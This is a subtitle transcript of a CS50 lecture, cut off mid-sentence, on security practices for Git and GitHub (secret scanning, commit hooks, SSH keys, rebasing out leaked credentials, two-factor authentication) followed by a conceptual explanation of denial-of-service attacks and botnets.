1 00:00:00,000 --> 00:00:17,213 2 00:00:17,213 --> 00:00:20,380 DOUG LLOYD: Now that we know a bit more about the internet and how it works, 3 00:00:20,380 --> 00:00:23,200 let's reintroduce the subject of security with this new context. 4 00:00:23,200 --> 00:00:26,100 And let's start by talking about Git and GitHub. 5 00:00:26,100 --> 00:00:28,540 Recall that Git and GitHub are a technology that 6 00:00:28,540 --> 00:00:31,990 are used by programmers to version control 7 00:00:31,990 --> 00:00:34,690 their software, which basically allows them the ability 8 00:00:34,690 --> 00:00:39,010 to save code to an internet-based repository in case of some failure 9 00:00:39,010 --> 00:00:41,830 locally, they have a backup place to put it, but also 10 00:00:41,830 --> 00:00:43,750 keep track of all the changes they've made 11 00:00:43,750 --> 00:00:46,120 and possibly go back in time in case they produce 12 00:00:46,120 --> 00:00:48,460 a version of code that is broken. 13 00:00:48,460 --> 00:00:50,440 GitHub has some great advantages, but it also 14 00:00:50,440 --> 00:00:53,110 has the potential disadvantages because of this structure 15 00:00:53,110 --> 00:00:54,590 of being able to go back in time. 16 00:00:54,590 --> 00:00:58,180 So for example, imagine that what we have is an initial commit, and commit 17 00:00:58,180 --> 00:01:01,828 is just GitHub parlance for a set of code 18 00:01:01,828 --> 00:01:03,370 that you are sending to the internet. 19 00:01:03,370 --> 00:01:07,720 So I've decided to take file A, file B, and file C in their current versions. 20 00:01:07,720 --> 00:01:12,190 I've saved them using control S or command S literally on my machine, 21 00:01:12,190 --> 00:01:14,800 and I want to send those versions to GitHub to be 22 00:01:14,800 --> 00:01:17,410 stored permanently or semi-permanently. 23 00:01:17,410 --> 00:01:19,900 You would package those up in what's called a commit 24 00:01:19,900 --> 00:01:23,560 and then push that code to GitHub where it would then be visible online. 25 00:01:23,560 --> 00:01:25,270 And this would be packaged as a commit. 26 00:01:25,270 --> 00:01:29,860 And all the files that we view on GitHub are tracked in terms of commits. 27 00:01:29,860 --> 00:01:31,450 And commits chain together. 28 00:01:31,450 --> 00:01:34,210 And we've seen this idea of chaining in the past when we've 29 00:01:34,210 --> 00:01:36,600 discussed linked lists, for example. 30 00:01:36,600 --> 00:01:39,100 So every commit knows about the one that comes after it once 31 00:01:39,100 --> 00:01:43,810 that commit is eventually pushed as well as all of the ones that preceded it. 32 00:01:43,810 --> 00:01:47,110 So imagine we have an initial comment where we post some code 33 00:01:47,110 --> 00:01:49,870 and then we write some more-- we make some more changes. 34 00:01:49,870 --> 00:01:52,510 We perhaps update our database in such a way 35 00:01:52,510 --> 00:01:57,790 where when we post or push-- excuse me-- our second commit to GitHub, 36 00:01:57,790 --> 00:02:00,460 we accidentally expose the database credentials. 37 00:02:00,460 --> 00:02:03,250 So perhaps someone inadvertently typed the password 38 00:02:03,250 --> 00:02:06,760 for how to access the database into some Python code that would then 39 00:02:06,760 --> 00:02:09,639 be used to access that database. 40 00:02:09,639 --> 00:02:10,930 That's not a good thing. 41 00:02:10,930 --> 00:02:13,833 And maybe somebody quickly realized it and said, you know what? 42 00:02:13,833 --> 00:02:15,250 We need to get this off of GitHub. 43 00:02:15,250 --> 00:02:16,570 It is a source repository. 44 00:02:16,570 --> 00:02:17,920 It's available online. 45 00:02:17,920 --> 00:02:22,390 And so they push a third commit to GitHub that deletes those credentials. 46 00:02:22,390 --> 00:02:26,740 It stores them somewhere else that's not going to be saved on this repository. 47 00:02:26,740 --> 00:02:29,977 But have we actually solved the problem? 48 00:02:29,977 --> 00:02:31,810 And you can probably imagine that the answer 49 00:02:31,810 --> 00:02:34,930 is no, because we have this idea of version control 50 00:02:34,930 --> 00:02:39,700 where every past iteration of all of these files 51 00:02:39,700 --> 00:02:43,840 is stored still on GitHub such that, if I needed to, I could go back in time. 52 00:02:43,840 --> 00:02:48,220 So even though I attempted to solve the security crisis I just 53 00:02:48,220 --> 00:02:52,360 created for myself by introducing a new commit that 54 00:02:52,360 --> 00:02:54,520 removes the credentials from those files such that, 55 00:02:54,520 --> 00:02:57,070 if I'm looking just at the most recent version of the files, 56 00:02:57,070 --> 00:02:58,147 I don't see it anymore. 57 00:02:58,147 --> 00:02:59,980 I still have the ability to go back in time, 58 00:02:59,980 --> 00:03:03,790 so this doesn't actually solve a problem. 59 00:03:03,790 --> 00:03:05,800 See, one of the interesting things about GitHub 60 00:03:05,800 --> 00:03:08,230 is the model that is used for it. 61 00:03:08,230 --> 00:03:10,120 At the very beginning of GitHub's existence, 62 00:03:10,120 --> 00:03:14,260 it relied pretty extensively on this idea of you sign up for free, 63 00:03:14,260 --> 00:03:16,030 you get a free account for GitHub, and you 64 00:03:16,030 --> 00:03:20,170 have a limited number of private repositories, repositories that are not 65 00:03:20,170 --> 00:03:24,250 publicly viewable or searchable, and you could pay to have more of them 66 00:03:24,250 --> 00:03:25,930 if you wanted to. 67 00:03:25,930 --> 00:03:29,650 But the majority of your repositories, assuming 68 00:03:29,650 --> 00:03:33,610 you did not opt into a paid account, were free, which 69 00:03:33,610 --> 00:03:37,720 meant anybody on the internet could search them using GitHub's search tool, 70 00:03:37,720 --> 00:03:40,600 or using even a regular search engine such as Google, 71 00:03:40,600 --> 00:03:42,790 could just look for something. 72 00:03:42,790 --> 00:03:46,990 And if your GitHub repositories happen to match what that person searched 73 00:03:46,990 --> 00:03:49,660 or specifically, if you're looking within GitHub search feature, 74 00:03:49,660 --> 00:03:52,620 if a user is looking for specific lines of code, 75 00:03:52,620 --> 00:03:56,138 anything in a public repository, it is available. 76 00:03:56,138 --> 00:03:58,180 Now, GitHub has recently changed to a model where 77 00:03:58,180 --> 00:04:01,720 there are more private repo-- or there's a higher limit 78 00:04:01,720 --> 00:04:04,840 on the number of private repositories that somebody could have. 79 00:04:04,840 --> 00:04:10,090 But this was part of Github's design to really encourage 80 00:04:10,090 --> 00:04:13,780 developers and programmers to sort of create this open source community where 81 00:04:13,780 --> 00:04:18,310 anybody could view someone else's code, and in GitHub parlance, 82 00:04:18,310 --> 00:04:21,670 fork their code, which basically means to take their entire repository 83 00:04:21,670 --> 00:04:26,830 or collection of files and copy it into their own GitHub repository 84 00:04:26,830 --> 00:04:29,760 to perhaps make changes or suggest changes, 85 00:04:29,760 --> 00:04:33,040 pushing those back into the code base with the idea being 86 00:04:33,040 --> 00:04:35,810 that it would make the entire community better. 87 00:04:35,810 --> 00:04:38,680 A side effect, of course, is that items get 88 00:04:38,680 --> 00:04:43,360 revealed when we do so because of this public repository setup we have here. 89 00:04:43,360 --> 00:04:47,200 So GitHub is great in terms of its ability for programmers 90 00:04:47,200 --> 00:04:49,930 to refer to materials on the internet. 91 00:04:49,930 --> 00:04:52,750 They don't have to rely on their own local machines to store code. 92 00:04:52,750 --> 00:04:57,070 It allows people to work from multiple workstations, 93 00:04:57,070 --> 00:04:59,590 similar to how Dropbox or Google Drive, for example, 94 00:04:59,590 --> 00:05:02,470 might allow you to access files from different machines. 95 00:05:02,470 --> 00:05:04,970 You don't have to be on a specific machine to access a file, 96 00:05:04,970 --> 00:05:08,500 as we used to have to do before these cloud-based document storage 97 00:05:08,500 --> 00:05:10,060 services existed. 98 00:05:10,060 --> 00:05:12,310 And it encourages collaboration. 99 00:05:12,310 --> 00:05:16,390 For example, if you and I were to collaborate on a GitHub repository, 100 00:05:16,390 --> 00:05:20,000 I could push changes to that repository that you could then pull. 101 00:05:20,000 --> 00:05:22,750 And we could then be working off of the same code base again. 102 00:05:22,750 --> 00:05:25,690 We sort of have this central repo-- 103 00:05:25,690 --> 00:05:28,630 central area where we share our code with one another. 104 00:05:28,630 --> 00:05:30,580 And we can each individually make changes 105 00:05:30,580 --> 00:05:33,520 and incorporate one another's changes into the final products. 106 00:05:33,520 --> 00:05:38,110 So we're always working off of the same base of material. 107 00:05:38,110 --> 00:05:40,210 The side effect, though, again, is this material 108 00:05:40,210 --> 00:05:44,260 is generally public unless you have opted into a private repository where 109 00:05:44,260 --> 00:05:46,450 you have specific individuals who are logged 110 00:05:46,450 --> 00:05:49,990 in with their GitHub accounts who want to share. 111 00:05:49,990 --> 00:05:52,420 So is there a way to solve this problem, though, of we 112 00:05:52,420 --> 00:05:55,087 accidentally expose our credentials in a public repository? 113 00:05:55,087 --> 00:05:56,920 Of course, if we're in a private repository, 114 00:05:56,920 --> 00:05:58,220 this might not be as alarming. 115 00:05:58,220 --> 00:05:59,920 It's still probably not something you-- 116 00:05:59,920 --> 00:06:03,130 it should be encouraged to have credentials 117 00:06:03,130 --> 00:06:07,480 for anything stored anywhere, whether public or private, on the internet. 118 00:06:07,480 --> 00:06:08,830 It's a little riskier. 119 00:06:08,830 --> 00:06:12,402 But is there a way to get rid of this or to prevent this problem from happening? 120 00:06:12,402 --> 00:06:14,860 And fortunately, there are a number of different safeguards 121 00:06:14,860 --> 00:06:17,680 specific to Git and GitHub that we can use 122 00:06:17,680 --> 00:06:22,240 to prevent the accidental leakage of information, so to speak. 123 00:06:22,240 --> 00:06:25,330 So for example, one way we can handle this is using a program or utility 124 00:06:25,330 --> 00:06:27,340 called GitSecrets. 125 00:06:27,340 --> 00:06:31,000 GitSecrets works by looking for what's called a regular expression. 126 00:06:31,000 --> 00:06:33,640 And a regular expression is computer science parlance 127 00:06:33,640 --> 00:06:37,600 for a particular formation of a string, so a certain number 128 00:06:37,600 --> 00:06:41,360 of characters, a certain number of digit characters, maybe some punctuation 129 00:06:41,360 --> 00:06:41,860 marks. 130 00:06:41,860 --> 00:06:46,360 You can say, I'm looking for strings that match this idea. 131 00:06:46,360 --> 00:06:49,630 And you can express this idea where this idea is all capital 132 00:06:49,630 --> 00:06:52,900 letters, all lowercase letters, this many numbers, and this many punctuation 133 00:06:52,900 --> 00:06:55,750 marks, and so on using this tool called a regular expression. 134 00:06:55,750 --> 00:06:59,410 But GitSecrets contains a list of these regular expressions 135 00:06:59,410 --> 00:07:02,710 and will warn you when you are about to make a commit, when you're 136 00:07:02,710 --> 00:07:05,650 about to push code or send code to GitHub to be stored 137 00:07:05,650 --> 00:07:10,030 in its online repository that you have a string that matches this pattern 138 00:07:10,030 --> 00:07:11,950 that you wanted me to warn you about. 139 00:07:11,950 --> 00:07:15,190 And so be sure before you commit this code 140 00:07:15,190 --> 00:07:19,600 and push this code that you actually intend to send this up 141 00:07:19,600 --> 00:07:23,380 to GitHub, because it may be that this matches a password string that you're 142 00:07:23,380 --> 00:07:24,560 trying to avoid. 143 00:07:24,560 --> 00:07:27,580 So that's an interesting tool that can be used for that. 144 00:07:27,580 --> 00:07:31,150 You also want to consider limiting third party app access. 145 00:07:31,150 --> 00:07:35,930 GitHub accounts are actually very common to use as other forms of login, 146 00:07:35,930 --> 00:07:36,770 for example. 147 00:07:36,770 --> 00:07:39,190 So there's a platform on the internet called 148 00:07:39,190 --> 00:07:42,190 OAuth which allows you to use, for example, your Facebook 149 00:07:42,190 --> 00:07:44,977 account or your Google account to log into other services. 150 00:07:44,977 --> 00:07:47,560 Perhaps you've encountered this in your own experience working 151 00:07:47,560 --> 00:07:49,510 with different services on the internet. 152 00:07:49,510 --> 00:07:54,010 Instead of creating a login for site x, you could use your Facebook or Google 153 00:07:54,010 --> 00:07:58,150 login, or, in many instances as well, your GitHub log in to do so. 154 00:07:58,150 --> 00:08:01,610 When you do so, though, you are allowing that third party application, 155 00:08:01,610 --> 00:08:07,090 someone that's not GitHub, the ability to use and access your GitHub identity 156 00:08:07,090 --> 00:08:08,120 or credential. 157 00:08:08,120 --> 00:08:12,640 And so you should be very careful with not only GitHub but other services 158 00:08:12,640 --> 00:08:17,560 as well, thinking about whether you want that other service to have access 159 00:08:17,560 --> 00:08:21,940 to your GitHub, or Facebook, or Google account information to use it even just 160 00:08:21,940 --> 00:08:23,380 for authentication. 161 00:08:23,380 --> 00:08:26,320 It's a good idea to try and limit how much third party app 162 00:08:26,320 --> 00:08:30,340 access you're giving to other services. 163 00:08:30,340 --> 00:08:33,520 Another tool is to use something called a commit hook. 164 00:08:33,520 --> 00:08:36,460 Now, commit hook is just a fancy term for a short program 165 00:08:36,460 --> 00:08:42,070 or set of instructions that executes when a commit is pushed to GitHub. 166 00:08:42,070 --> 00:08:44,740 So for example, many of the course websites 167 00:08:44,740 --> 00:08:48,490 that we use here at Harvard for CS50 are GitHub-based, 168 00:08:48,490 --> 00:08:52,030 which means that when we want to change the content on the course website, 169 00:08:52,030 --> 00:08:56,350 we update some HTML, or Python, or JavaScript files, we push those 170 00:08:56,350 --> 00:09:01,000 to GitHub, and that triggers a commit hook where basically that commit 171 00:09:01,000 --> 00:09:04,570 hook copies those files into our web server, 172 00:09:04,570 --> 00:09:07,420 runs some tests on them to make sure that there's no errors in them. 173 00:09:07,420 --> 00:09:10,390 For example, if we wrote some JavaScript or Python that was breaking, 174 00:09:10,390 --> 00:09:15,250 it had a bug in it, we'd rather not deploy that bug so to speak. 175 00:09:15,250 --> 00:09:17,710 We wouldn't want the broken version of the code 176 00:09:17,710 --> 00:09:21,190 to replace the currently working website. 177 00:09:21,190 --> 00:09:23,750 And so commit hook can be used to do testing as well. 178 00:09:23,750 --> 00:09:26,170 And then once all the tests pass, we then 179 00:09:26,170 --> 00:09:28,300 are able to activate those files on the web server 180 00:09:28,300 --> 00:09:29,890 and the changes have happened. 181 00:09:29,890 --> 00:09:32,530 So we're using GitHub to store the changes 182 00:09:32,530 --> 00:09:35,650 that we want to make on our site, the HTML, the Python, 183 00:09:35,650 --> 00:09:37,870 the JavaScript changes that we want to make. 184 00:09:37,870 --> 00:09:41,650 And then we're using this commit hook, a set of instructions, 185 00:09:41,650 --> 00:09:45,340 to copy them over and actually deploy those changes to the website 186 00:09:45,340 --> 00:09:48,430 once we've verified that we haven't made anything break. 187 00:09:48,430 --> 00:09:52,210 You can also use commit hooks, for example, to check for passwords 188 00:09:52,210 --> 00:09:56,830 and have it warn you if you have perhaps leaked a credential. 189 00:09:56,830 --> 00:10:00,040 And then you can undo that with a technique 190 00:10:00,040 --> 00:10:02,480 that we'll see in just a moment. 191 00:10:02,480 --> 00:10:06,250 Another thing that you can do when using GitHub to protect or verify 192 00:10:06,250 --> 00:10:09,180 your identity is to use an SSH key. 193 00:10:09,180 --> 00:10:12,653 SSH keys are a special form of a public and private key. 194 00:10:12,653 --> 00:10:15,070 In this case, it's really not used for encryption, though. 195 00:10:15,070 --> 00:10:17,535 It's actually used as identification. 196 00:10:17,535 --> 00:10:19,410 And so this idea of digital signatures, which 197 00:10:19,410 --> 00:10:22,860 you may recall from a few lectures ago, comes back into play. 198 00:10:22,860 --> 00:10:27,600 Whenever I use an SSH key to push my code to GitHub, what happens 199 00:10:27,600 --> 00:10:33,150 is I also digitally sign the commit when I send it up. 200 00:10:33,150 --> 00:10:36,870 And so before that commit gets posted to GitHub, 201 00:10:36,870 --> 00:10:40,200 GitHub verifies this by checking my public key 202 00:10:40,200 --> 00:10:43,230 and verifying, using the mathematics that we've seen in the past, 203 00:10:43,230 --> 00:10:46,650 that, yes, only Doug could have sent this to me 204 00:10:46,650 --> 00:10:53,160 because only Doug's public key will unscramble this set of zeros and ones 205 00:10:53,160 --> 00:10:57,180 that I received that only could have then been created by his private key. 206 00:10:57,180 --> 00:10:59,550 These two things are reciprocal of one another. 207 00:10:59,550 --> 00:11:01,980 So we can use SSH keys and digital signatures 208 00:11:01,980 --> 00:11:05,850 as an identity verification scheme as well for GitHub 209 00:11:05,850 --> 00:11:08,430 as we might be able to for mailing documents, or sending 210 00:11:08,430 --> 00:11:11,160 documents, or something like that. 211 00:11:11,160 --> 00:11:15,300 Now, imagine we have posted the credentials accidentally. 212 00:11:15,300 --> 00:11:17,130 Is there a way to get rid of them? 213 00:11:17,130 --> 00:11:18,930 GitHub does track our entire history. 214 00:11:18,930 --> 00:11:20,430 But what if we do make a mistake? 215 00:11:20,430 --> 00:11:22,410 Human beings are fallible. 216 00:11:22,410 --> 00:11:25,980 And so there is a way to actually eliminate the history. 217 00:11:25,980 --> 00:11:29,697 And that is using a command called Git Rebase. 218 00:11:29,697 --> 00:11:32,280 So let's go back to the illustration we had a moment ago where 219 00:11:32,280 --> 00:11:34,250 we have several different commits. 220 00:11:34,250 --> 00:11:37,210 And I've added a fourth commit here just for purposes of illustration. 221 00:11:37,210 --> 00:11:38,960 So our first commit and our second commit, 222 00:11:38,960 --> 00:11:42,180 and then it's after that that we expose the credentials accidentally, 223 00:11:42,180 --> 00:11:47,010 and then we have a fourth commit where we actually delete that mistake that we 224 00:11:47,010 --> 00:11:48,300 had previously made. 225 00:11:48,300 --> 00:11:51,810 When we want to Git Rebase, the idea is we want 226 00:11:51,810 --> 00:11:54,370 to delete a portion of the history. 227 00:11:54,370 --> 00:11:56,120 Now, deleting a portion of the history has 228 00:11:56,120 --> 00:11:59,075 a side effect of any changes that I made here or here. 229 00:11:59,075 --> 00:12:01,950 In this illustration, we're going to get rid of the last two commits. 230 00:12:01,950 --> 00:12:05,460 Any changes that I've made besides accidentally exposing the credentials 231 00:12:05,460 --> 00:12:07,170 are also going to be destroyed. 232 00:12:07,170 --> 00:12:11,220 And so it's going to be incumbent on us to make sure to copy and save 233 00:12:11,220 --> 00:12:15,150 the changes we actually want to preserve in case we've done more than just 234 00:12:15,150 --> 00:12:16,530 expose the credentials. 235 00:12:16,530 --> 00:12:19,170 And then we'll have to make a new commit in this new history 236 00:12:19,170 --> 00:12:23,100 we create so that we can still preserve those changes that we want to make. 237 00:12:23,100 --> 00:12:25,620 But let's say, other than the credentials, 238 00:12:25,620 --> 00:12:27,900 I didn't actually do anything else. 239 00:12:27,900 --> 00:12:33,330 One thing I could do is rebase or set as a new start point, basically, 240 00:12:33,330 --> 00:12:36,190 this second commit as the end of the chain. 241 00:12:36,190 --> 00:12:40,590 So instead of going all the way to here and having that preserved ad infinitum, 242 00:12:40,590 --> 00:12:44,430 I want to just get rid of everything from the second commit forward. 243 00:12:44,430 --> 00:12:45,300 And I can do that. 244 00:12:45,300 --> 00:12:49,110 And then those commits are no longer remembered by GitHub. 245 00:12:49,110 --> 00:12:52,110 And as soon as the next commit I have would go here, 246 00:12:52,110 --> 00:12:56,760 right after second commit as opposed to imagining a fifth one there 247 00:12:56,760 --> 00:12:59,580 right after credentials being removed, those commits 248 00:12:59,580 --> 00:13:03,570 are, for all intents and purposes on GitHub, forgotten. 249 00:13:03,570 --> 00:13:06,330 And finally, one more thing that we can do when using GitHub 250 00:13:06,330 --> 00:13:09,420 is to mandate the use of two-factor authentication. 251 00:13:09,420 --> 00:13:12,810 Recall we've discussed two-factor authentication a little bit previously. 252 00:13:12,810 --> 00:13:16,890 And the idea is that you have a backup mechanism 253 00:13:16,890 --> 00:13:19,650 to prevent unauthorized login. 254 00:13:19,650 --> 00:13:21,720 And the two factors in two-factor authentication 255 00:13:21,720 --> 00:13:26,520 are not two passwords, because those are fundamentally quite similar. 256 00:13:26,520 --> 00:13:29,850 The idea is that you want to have something that you know, for example, 257 00:13:29,850 --> 00:13:33,150 a password-- that's usually very commonly one of the two factors 258 00:13:33,150 --> 00:13:35,220 in two-factor authentication-- 259 00:13:35,220 --> 00:13:37,590 and something that you have, the thought being 260 00:13:37,590 --> 00:13:42,900 that an adversary is incredibly unlikely to have both things at the same time. 261 00:13:42,900 --> 00:13:45,120 They may know your password, but they probably 262 00:13:45,120 --> 00:13:49,320 don't have your cell phone, for example, or your RSA key. 263 00:13:49,320 --> 00:13:54,360 They may have stolen your phone or they may have stolen your RSA key, 264 00:13:54,360 --> 00:13:57,390 but they probably don't also know your password. 265 00:13:57,390 --> 00:14:00,690 And so the idea is that this provides an additional level of defense 266 00:14:00,690 --> 00:14:04,080 against potential hacking, or breaking into accounts, 267 00:14:04,080 --> 00:14:06,660 or unauthorized behavior in accounts that you obviously 268 00:14:06,660 --> 00:14:08,190 don't want to happen. 269 00:14:08,190 --> 00:14:11,562 Now, an RSA key, if you're unfamiliar, is something that looks like this. 270 00:14:11,562 --> 00:14:13,020 There's different versions of them. 271 00:14:13,020 --> 00:14:14,437 They've sort of evolved over time. 272 00:14:14,437 --> 00:14:18,660 This one is actually a combined RSA key and USB drive. 273 00:14:18,660 --> 00:14:22,020 And inside the window here of the RSA key 274 00:14:22,020 --> 00:14:26,010 is a six digit number that just changes every 60 seconds or so. 275 00:14:26,010 --> 00:14:28,900 So when you are given one of these, for example, 276 00:14:28,900 --> 00:14:32,310 perhaps at a firm or a business, it is assigned to you specifically. 277 00:14:32,310 --> 00:14:35,530 There's a server that your IT team will have 278 00:14:35,530 --> 00:14:39,960 setup that maps the serial number on the back of this RSA key 279 00:14:39,960 --> 00:14:42,120 to your employee ID, for example. 280 00:14:42,120 --> 00:14:47,010 But they otherwise don't know what the number currently on the RSA key is. 281 00:14:47,010 --> 00:14:51,840 They only know who owns it, who is physically in possession of it, which 282 00:14:51,840 --> 00:14:53,210 employee ID it maps do. 283 00:14:53,210 --> 00:14:54,990 And every 60 seconds it changes according 284 00:14:54,990 --> 00:14:59,430 to some mathematical algorithm that is built into the key that generates 285 00:14:59,430 --> 00:15:02,190 numbers in a pseudo random way. 286 00:15:02,190 --> 00:15:05,490 And after 60 seconds, that code will change into something else. 287 00:15:05,490 --> 00:15:10,130 And you'll need to actually have the key on you to complete a login. 288 00:15:10,130 --> 00:15:12,810 If an RSA key is being used to secure such 289 00:15:12,810 --> 00:15:15,483 that you need to enter a password and your RSA key value, 290 00:15:15,483 --> 00:15:16,650 you would need to have both. 291 00:15:16,650 --> 00:15:19,872 No other employee RSA key-- well, hypothetically, I 292 00:15:19,872 --> 00:15:21,830 guess there's a one in a million chance that it 293 00:15:21,830 --> 00:15:24,705 would happen to be randomly showing the same number at the same time. 294 00:15:24,705 --> 00:15:28,100 But no other employee's RSA key could be used to log in. 295 00:15:28,100 --> 00:15:30,690 Only yours could be used to log in. 296 00:15:30,690 --> 00:15:32,690 Now, there are several different tools out there 297 00:15:32,690 --> 00:15:35,810 that can be used to provide two-factor authentication services. 298 00:15:35,810 --> 00:15:39,628 And there's really no technical reason not to use these services. 299 00:15:39,628 --> 00:15:42,170 You'll find them as applications on cell phones, most likely. 300 00:15:42,170 --> 00:15:46,310 And you'll find ones like this, Google Authenticator, Authy, Duo Mobile. 301 00:15:46,310 --> 00:15:47,360 There are lots of others. 302 00:15:47,360 --> 00:15:50,390 And if you don't want to use one of those applications specifically, 303 00:15:50,390 --> 00:15:53,210 many services also just allow you to receive a text message 304 00:15:53,210 --> 00:15:54,902 from the service itself. 305 00:15:54,902 --> 00:15:56,860 And you'll just get that via SMS on your phone, 306 00:15:56,860 --> 00:16:00,470 so still on your phone, just not tied to a specific application. 307 00:16:00,470 --> 00:16:05,690 And while there's no technical reason to avoid two-factor authentication, 308 00:16:05,690 --> 00:16:08,600 there is sort of this social friction surrounding 309 00:16:08,600 --> 00:16:13,580 two-factor authentication in that human beings tend to find it annoying, right? 310 00:16:13,580 --> 00:16:15,860 It used to be username, password, you're logged in. 311 00:16:15,860 --> 00:16:16,920 It's pretty quick. 312 00:16:16,920 --> 00:16:19,630 Now it's username, password, you get brought to another screen, 313 00:16:19,630 --> 00:16:22,880 you're asked to enter a six-digit code, or maybe in some advanced applications 314 00:16:22,880 --> 00:16:26,390 you get a push notification sent to your device that you have to unlock 315 00:16:26,390 --> 00:16:28,970 and then hit OK on the device. 316 00:16:28,970 --> 00:16:31,280 And people just find that inconvenient. 317 00:16:31,280 --> 00:16:34,400 We haven't yet reached this point culturally 318 00:16:34,400 --> 00:16:39,440 where two-factor authentication is the norm. 319 00:16:39,440 --> 00:16:43,610 And so it's sort of a linchpin when we talk about security 320 00:16:43,610 --> 00:16:49,400 in the internet context, is human beings being the limiting factor 321 00:16:49,400 --> 00:16:51,980 for how secure we can be. 322 00:16:51,980 --> 00:16:56,810 We have the technology to take steps to protect ourselves, 323 00:16:56,810 --> 00:16:59,360 but we don't feel compelled to do so. 324 00:16:59,360 --> 00:17:03,260 And we'll see this pattern reemerge in a few other places today. 325 00:17:03,260 --> 00:17:06,315 But just know that that is why perhaps you're 326 00:17:06,315 --> 00:17:08,690 not seeing so much adoption of two-factor authentication. 327 00:17:08,690 --> 00:17:11,480 It's not that it's technically infeasible to do so. 328 00:17:11,480 --> 00:17:14,900 It's just that we just find it annoying to do so, 329 00:17:14,900 --> 00:17:19,401 and so we don't adopt it as aggressively as perhaps we should. 330 00:17:19,401 --> 00:17:21,109 Now let's discuss the type of attack that 331 00:17:21,109 --> 00:17:24,109 occurs on the internet with unfortunate regularity, 332 00:17:24,109 --> 00:17:27,270 and that is the idea of a denial of service attack. 333 00:17:27,270 --> 00:17:29,450 Now, the idea behind these attacks is basically 334 00:17:29,450 --> 00:17:32,000 to cripple the infrastructure of a website. 335 00:17:32,000 --> 00:17:34,460 Now, the reason for this might be financial. 336 00:17:34,460 --> 00:17:36,050 You want to try and sabotage somebody. 337 00:17:36,050 --> 00:17:39,380 There might be other motivations, distraction, for example, 338 00:17:39,380 --> 00:17:42,380 by tying up their resources, trying to stop the attack. 339 00:17:42,380 --> 00:17:44,510 It opens up another avenue to do something else, 340 00:17:44,510 --> 00:17:46,077 to perhaps steal information. 341 00:17:46,077 --> 00:17:48,410 There's many different motivations for why they do this. 342 00:17:48,410 --> 00:17:51,020 And some of them are honestly just boredom or fun. 343 00:17:51,020 --> 00:17:54,140 Amateur hackers sometimes think it's fun to just initiate 344 00:17:54,140 --> 00:17:57,110 a denial of service attack against an entity that 345 00:17:57,110 --> 00:17:59,870 is not prepared to handle it. 346 00:17:59,870 --> 00:18:02,480 Now, in the associated materials for this course, 347 00:18:02,480 --> 00:18:06,380 we provided an article called Making Cyberspace Safe for Democracy, which 348 00:18:06,380 --> 00:18:08,870 we really do encourage you to take a look at, read, 349 00:18:08,870 --> 00:18:10,597 and discuss with your group. 350 00:18:10,597 --> 00:18:12,680 But I also want to take a little bit of time right 351 00:18:12,680 --> 00:18:15,590 now just to talk about this article in particular 352 00:18:15,590 --> 00:18:18,680 and draw your attention to some areas of concern 353 00:18:18,680 --> 00:18:21,710 or some areas that might lead to more discussion. 354 00:18:21,710 --> 00:18:25,070 Now, the biggest of these is these attacks 355 00:18:25,070 --> 00:18:28,875 tend not to be taken very seriously by people when they hear about them. 356 00:18:28,875 --> 00:18:31,250 You'll occasionally hear about these attacks in the news, 357 00:18:31,250 --> 00:18:33,350 denial of service attacks, or their cousin, 358 00:18:33,350 --> 00:18:35,930 distributed denial of service attacks. 359 00:18:35,930 --> 00:18:39,800 But culturally, again, us being humans and sort 360 00:18:39,800 --> 00:18:42,650 of neglecting some of the real security concerns here, 361 00:18:42,650 --> 00:18:44,420 we don't think of it as an attack. 362 00:18:44,420 --> 00:18:48,740 And that's maybe because of how we hear about other kinds of attacks 363 00:18:48,740 --> 00:18:52,340 on the news that seem more physically devastating, 364 00:18:52,340 --> 00:18:55,310 that have more real consequences. 365 00:18:55,310 --> 00:19:00,860 And it makes it hard to have a serious conversation about cyber attacks 366 00:19:00,860 --> 00:19:06,650 because there's this friction that we face trying to get people to understand 367 00:19:06,650 --> 00:19:08,600 that these are meaningful and real. 368 00:19:08,600 --> 00:19:12,530 And in particular, these attacks are kind of insidious. 369 00:19:12,530 --> 00:19:17,355 They're really easy to execute without much difficulty at all, 370 00:19:17,355 --> 00:19:20,480 especially against a small business that might be running its own server as 371 00:19:20,480 --> 00:19:22,640 opposed to relying on a cloud service. 372 00:19:22,640 --> 00:19:29,150 A pretty top-of-the-line, commercially available machine might be able 373 00:19:29,150 --> 00:19:33,200 to execute a denial of service or DoS attack on its own. 374 00:19:33,200 --> 00:19:37,310 It doesn't even require exceptional resources. 375 00:19:37,310 --> 00:19:41,450 Now, when we start to attack mid-sized companies, or larger companies 376 00:19:41,450 --> 00:19:45,110 or entities, one single computer from one single IP address 377 00:19:45,110 --> 00:19:47,480 is not typically going to be enough. 378 00:19:47,480 --> 00:19:52,730 And so instead, you would have a distributed denial of service attack. 379 00:19:52,730 --> 00:19:54,620 In a distributed denial of service attack, 380 00:19:54,620 --> 00:19:58,070 there is still generally one core hacker, or one collective group 381 00:19:58,070 --> 00:19:59,960 of hackers or adversaries that are trying 382 00:19:59,960 --> 00:20:03,647 to penetrate some company's defenses. 383 00:20:03,647 --> 00:20:05,480 But they can't do it with their own machine. 384 00:20:05,480 --> 00:20:08,210 And so what they do is create something called a botnet. 385 00:20:08,210 --> 00:20:09,890 Perhaps you've heard this term before. 386 00:20:09,890 --> 00:20:12,590 A botnet basically happens, or is created, 387 00:20:12,590 --> 00:20:17,103 when hackers or adversaries distribute worms or viruses sort of 388 00:20:17,103 --> 00:20:17,770 surreptitiously. 389 00:20:17,770 --> 00:20:19,700 Perhaps they packaged them into some download. 390 00:20:19,700 --> 00:20:22,780 People don't notice anything about the worm or anything 391 00:20:22,780 --> 00:20:25,750 about this program that has been covertly installed on their machine. 392 00:20:25,750 --> 00:20:30,010 It doesn't do anything in particular until it is activated. 393 00:20:30,010 --> 00:20:32,500 And then it becomes an agent or a zombie-- 394 00:20:32,500 --> 00:20:34,930 sometimes you'll hear it termed that as well-- 395 00:20:34,930 --> 00:20:36,400 controlled by the hackers. 396 00:20:36,400 --> 00:20:39,130 And so all of a sudden the adversaries gain 397 00:20:39,130 --> 00:20:42,190 control of many different devices, hundreds or thousands 398 00:20:42,190 --> 00:20:46,450 or tens of thousands, or even more in some of the bigger attacks 399 00:20:46,450 --> 00:20:50,602 that have happened, basically turning these computers-- 400 00:20:50,602 --> 00:20:52,310 rendering all of them under their control 401 00:20:52,310 --> 00:20:55,130 and being able to direct them to take whatever action they want. 402 00:20:55,130 --> 00:20:58,870 And in particular, in the case of a distributed denial of service attack, 403 00:20:58,870 --> 00:21:03,190 all of these computers are going to make web requests 404 00:21:03,190 --> 00:21:07,810 to the same server or same website, because that's the idea. 405 00:21:07,810 --> 00:21:09,180 You have so many requests. 406 00:21:09,180 --> 